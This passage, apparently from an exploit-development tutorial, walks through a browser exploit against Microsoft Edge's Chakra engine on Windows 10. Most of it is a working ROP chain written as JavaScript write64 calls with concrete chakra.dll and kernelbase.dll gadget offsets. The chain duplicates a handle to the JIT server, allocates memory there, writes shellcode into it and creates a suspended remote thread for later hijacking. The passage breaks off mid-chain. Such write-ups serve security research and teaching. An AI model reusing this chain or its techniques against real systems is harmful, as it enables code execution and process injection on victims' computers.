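    const sum = baseLo + offset;                     // may exceed 32 bits
    const lo = sum >>> 0;                            // wrap the low half to 32 bits
    const carry = sum > 0xffffffff ? 1 : 0;          // carry into the high half
    const hi = (baseHi + carry) >>> 0;
    return [lo, hi];
}

// Made-up example: chain stored at 0x00007ffc0574b000, patch the 5th entry (index 4)
const slot = chainSlotAddress(0x0574b000, 0x00007ffc, 4);
console.log(slot.map(v => "0x" + v.toString(16)));
```

The exploit itself simply adds the offset to chakraLo, which works as long as the addition does not overflow the low 32 bits; the carry handling here is only for completeness.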

VirtualAlloc ROP Chain

This next function call, a call to VirtualAlloc, may seem a bit confusing. We don’t strictly need to call this function from an exploitation technique perspective. After this call, however, we will call GetThreadContext to retrieve the state of the CPU registers for our previously created thread within the JIT process, so that we can leak the value of RSP and eventually write our final ROP chain there. GetThreadContext expects a pointer to a CONTEXT structure, which the function fills out with the current CPU register state of a given thread (our remotely created thread).

On the current version of Windows used to develop this exploit, Windows 10 1703, a CONTEXT structure is 0x4d0 bytes in size. So, we will be setting up a call to VirtualAlloc to allocate 0x4d0 bytes of memory to store this structure for later usage.
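To make the role of this buffer more concrete, the following sketch models a 0x4d0-byte CONTEXT structure as a local ArrayBuffer and reads the Rsp field back out of it. The 0x98 offset for Rsp comes from the x64 CONTEXT layout in winnt.h. The function name readRspFromContext and the register value are made up for illustration, and in the exploit the read would go through the arbitrary read primitive rather than a DataView.

```javascript
const CONTEXT_SIZE = 0x4d0;        // sizeof(CONTEXT) on x64, as stated above
const CONTEXT_RSP_OFFSET = 0x98;   // offset of the Rsp field in the x64 CONTEXT layout

// Hypothetical helper: return Rsp as [low32, high32] from a CONTEXT-sized buffer
function readRspFromContext(buffer) {
    const view = new DataView(buffer);
    const lo = view.getUint32(CONTEXT_RSP_OFFSET, true);      // little-endian low half
    const hi = view.getUint32(CONTEXT_RSP_OFFSET + 4, true);  // little-endian high half
    return [lo, hi];
}

// Simulate a CONTEXT that GetThreadContext has already filled in (values are made up)
const fakeContext = new ArrayBuffer(CONTEXT_SIZE);
const fill = new DataView(fakeContext);
fill.setUint32(CONTEXT_RSP_OFFSET, 0x1234f000, true);
fill.setUint32(CONTEXT_RSP_OFFSET + 4, 0x000000a1, true);

const rsp = readRspFromContext(fakeContext);
console.log("RSP = 0x" + rsp[1].toString(16) + rsp[0].toString(16).padStart(8, "0"));
```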

Here is how our call will be set up:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);
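Under the x64 __fastcall convention used throughout this post, these four arguments land in RCX, RDX, R8, and R9. The short sketch below only computes the concrete values each register needs to hold. The constants are the documented Win32 values, while the virtualAllocArgs object is a hypothetical name used only for this illustration.

```javascript
// Documented Win32 constants
const MEM_COMMIT = 0x1000;
const MEM_RESERVE = 0x2000;
const PAGE_READWRITE = 0x04;
const SIZEOF_CONTEXT = 0x4d0;   // size of a CONTEXT structure, as stated above

// Hypothetical register map for the VirtualAlloc call
const virtualAllocArgs = {
    rcx: 0x0,                        // LPVOID lpAddress (NULL)
    rdx: SIZEOF_CONTEXT,             // SIZE_T dwSize
    r8:  MEM_COMMIT | MEM_RESERVE,   // DWORD flAllocationType
    r9:  PAGE_READWRITE              // DWORD flProtect
};

for (const [reg, value] of Object.entries(virtualAllocArgs)) {
    console.log(reg.toUpperCase() + " = 0x" + value.toString(16));
}
```

Because all four arguments fit in registers, nothing needs to be placed on the stack for this call beyond the usual shadow space and return address.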

Here is how this looks with ROP (with all previous ROP chains for context):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return value (the address of the allocation) in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below, where we have to read from the address at +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Store the thread HANDLE returned in RAX)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which points to the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
